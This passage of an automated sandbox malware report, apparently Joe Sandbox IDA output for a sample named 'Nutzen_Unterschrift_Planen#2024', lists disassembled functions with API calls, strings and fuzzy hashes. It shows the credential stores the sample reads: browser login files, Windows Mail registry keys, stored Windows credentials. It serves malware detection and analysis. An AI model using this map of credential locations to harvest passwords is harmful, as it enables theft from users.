                                                            APIs
                                                              • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                              • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                              • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                              • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                              • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                              • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                            • strlen.MSVCRT ref: 0040F139
                                                            • strlen.MSVCRT ref: 0040F147
                                                            • memset.MSVCRT ref: 0040F187
                                                            • strlen.MSVCRT ref: 0040F196
                                                            • strlen.MSVCRT ref: 0040F1A4
                                                            • memset.MSVCRT ref: 0040F1EA
                                                            • strlen.MSVCRT ref: 0040F1F9
                                                            • strlen.MSVCRT ref: 0040F207
                                                            • _strcmpi.MSVCRT ref: 0040F2B2
                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                            • String ID: logins.json$none$signons.sqlite$signons.txt
                                                            • API String ID: 2003275452-3138536805
                                                            • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                            • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                            • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                            • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                            Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040C3F7
                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                            • strrchr.MSVCRT ref: 0040C417
                                                            • _mbscat.MSVCRT ref: 0040C431
                                                            • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                            • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                            • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                            • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                            • API String ID: 1012775001-1343505058
                                                            • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                            • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                            • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                            • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                            Function 0040CDDA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _strcmpi
                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                            • API String ID: 1439213657-1959339147
                                                            • Opcode ID: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                                            • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                            • Opcode Fuzzy Hash: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                                            • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                            Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00444612
                                                              • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                            • strlen.MSVCRT ref: 0044462E
                                                            • memset.MSVCRT ref: 00444668
                                                            • memset.MSVCRT ref: 0044467C
                                                            • memset.MSVCRT ref: 00444690
                                                            • memset.MSVCRT ref: 004446B6
                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                              • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                            • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                            • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                            • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                            • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                            • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset$strlen$_mbscpy
                                                            • String ID: salu
                                                            • API String ID: 3691931180-4177317985
                                                            • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                            • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                            • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                            • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                            Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                            • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Library$FreeLoad
                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                            • API String ID: 2449869053-232097475
                                                            • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                            • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                            • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                            • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                            Function 00443AAB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registrystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            • strlen.MSVCRT ref: 00443AD2
                                                            • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                            • memset.MSVCRT ref: 00443B2E
                                                            • memset.MSVCRT ref: 00443B4B
                                                            • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                            • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                            • LocalFree.KERNEL32(?), ref: 00443C23
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                              • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                            Strings
                                                            • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                            • Salt, xrefs: 00443BA7
                                                            • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                            • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                            • API String ID: 665470638-2687544566
                                                            • Opcode ID: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                            • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                            • Opcode Fuzzy Hash: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                            • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                            Function 0040F802 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                            • memset.MSVCRT ref: 0040F84A
                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                            • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                            • LocalFree.KERNEL32(?), ref: 0040F92C
                                                            • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                            • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                            • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                            • API String ID: 551151806-1288872324
                                                            • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                            • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                            • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                            • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                            Function 00403E96 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75D50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75D50A60), ref: 00406D4D
                                                            • memset.MSVCRT ref: 00403ECE
                                                            • memset.MSVCRT ref: 00403EE2
                                                            • memset.MSVCRT ref: 00403EF6
                                                            • sprintf.MSVCRT ref: 00403F17
                                                            • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                            • sprintf.MSVCRT ref: 00403F6A
                                                            • sprintf.MSVCRT ref: 00403F9B
                                                            Strings
                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                            • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                            • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                            • API String ID: 113626815-1670831295
                                                            • Opcode ID: b2fae93db892e93611053a9993d135149b989cdc37ddc67be39363e78f3e4061
                                                            • Instruction ID: 68eec6ff6ffa0e14b7f0c60be0e91221167be1d604113ab21f184662466f1ff3
                                                            • Opcode Fuzzy Hash: b2fae93db892e93611053a9993d135149b989cdc37ddc67be39363e78f3e4061
                                                            • Instruction Fuzzy Hash: 0931A5B3D00258BEEB50DB54CC82FDE77ACEF54305F1001ABF548A3141DA78AB888B69
                                                            Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sprintf.MSVCRT ref: 0040957B
                                                            • LoadMenuA.USER32(?,?), ref: 00409589
                                                              • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                              • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                              • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                              • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                            • DestroyMenu.USER32(00000000), ref: 004095A7
                                                            • sprintf.MSVCRT ref: 004095EB
                                                            • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                            • memset.MSVCRT ref: 0040961C
                                                            • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                            • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                            • DestroyWindow.USER32(00000000), ref: 0040965C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                            • String ID: caption$dialog_%d$menu_%d
                                                            • API String ID: 3259144588-3822380221
                                                            • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                            • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                            • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                            • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                            Function 0040FFB0 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040FE20), ref: 0040FFBF
                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040FFD8
                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040FFE9
                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040FFFA
                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041000B
                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041001C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                            • API String ID: 667068680-3953557276
                                                            • Opcode ID: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                            • Instruction ID: ef187524dc85a124578c70d9a5034bc1ef4a482c247f5fceb27d5c4ea416582d
                                                            • Opcode Fuzzy Hash: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                            • Instruction Fuzzy Hash: 15F06D30A007566AA7234B297C91BAB2EB89B4DB81715003BA400E6251DBE8D8C1CA6D
                                                            Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                            • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                            • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                            • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                            • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                            • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Library$FreeLoad
                                                            • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                            • API String ID: 2449869053-4258758744
                                                            • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                            • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                            • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                            • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                            Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wcsstr.MSVCRT ref: 0040426A
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                            • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                            • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                            • strchr.MSVCRT ref: 004042F6
                                                            • strlen.MSVCRT ref: 0040430A
                                                            • sprintf.MSVCRT ref: 0040432B
                                                            • strchr.MSVCRT ref: 0040433C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                            • String ID: %s@gmail.com$www.google.com
                                                            • API String ID: 3866421160-4070641962
                                                            • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                            • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                            • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                            • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                            Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                            • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                              • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                              • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                              • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                            • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                            • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                            • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                            • memset.MSVCRT ref: 004097BD
                                                            • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                              • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                            • String ID: TranslatorName$TranslatorURL$general$strings
                                                            • API String ID: 1035899707-3647959541
                                                            • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                            • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                            • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
